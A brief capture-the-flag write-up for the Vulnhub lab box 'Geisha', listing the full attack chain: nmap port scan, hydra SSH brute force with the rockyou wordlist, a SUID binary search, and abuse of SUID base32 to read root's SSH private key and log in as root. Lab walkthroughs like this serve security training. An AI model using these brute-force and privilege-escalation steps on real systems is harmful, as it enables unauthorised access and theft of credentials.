Howdy,
For the impatient, here’s a quick summary of breaking into the Vulnhub box “Geisha”
- sudo nmap -p- 1.2.3.4 [reveals any open ports. Lots of them, one of which is ssh on tcp/22. So…
- hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://1.2.3.4 [Or whatever IP you’re targeting]
- The password ‘letmein‘ is revealed (no quotes). SSH into the box for the first flag in geisha’s home dir.
- One way ahead for privilege escalation is searching for SUID binaries with: $find / -perm -u=s -type f 2>/dev/null
- This reveals the binary base32 has its SUID bit set so try: $base32 “/root/.ssh/id_rsa” | base32–decode
- This dumps root’s private certificate id_rsa into stdout so you can ssh back into the local box as root! lol
- $ssh -i id_rsa root@localhost [Don’t forget to set perms on it or ssh server bitches. $chmod 600 id_rsa
- #cat proof.txt for the 2nd flag.